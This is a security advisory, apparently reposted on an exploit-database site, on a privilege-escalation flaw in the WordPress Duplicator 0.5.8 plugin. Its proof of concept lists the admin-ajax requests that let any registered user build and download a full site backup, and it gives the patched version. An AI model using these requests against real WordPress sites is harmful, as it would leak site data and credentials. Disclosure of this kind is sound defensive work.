WordPress Duplicator 0.5.8 Privilege Escalation

2015.02.19
Credit: Kacper Szurek
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

# Exploit Title: Duplicator 0.5.8 Privilege Escalation # Date: 21-11-2014 # Software Link: https://wordpress.org/plugins/duplicator/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # Category: webapps 1. Description Every registered user can create and download backup files. File: duplicator\duplicator.php add_action('wp_ajax_duplicator_package_scan', 'duplicator_package_scan'); add_action('wp_ajax_duplicator_package_build', 'duplicator_package_build'); add_action('wp_ajax_duplicator_package_delete', 'duplicator_package_delete'); add_action('wp_ajax_duplicator_package_report', 'duplicator_package_report'); http://security.szurek.pl/duplicator-058-privilege-escalation.html 2. Proof of Concept Login as regular user (created using wp-login.php?action=register) then start scan: http://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_scan After that you can build backup: http://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_build This function will return json with backup name inside File key. You can download backup using: http://wordpress-url/wp-snapshots/%file_name_from_json% 3. Solution: Update to version 0.5.10

References:

http://security.szurek.pl/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top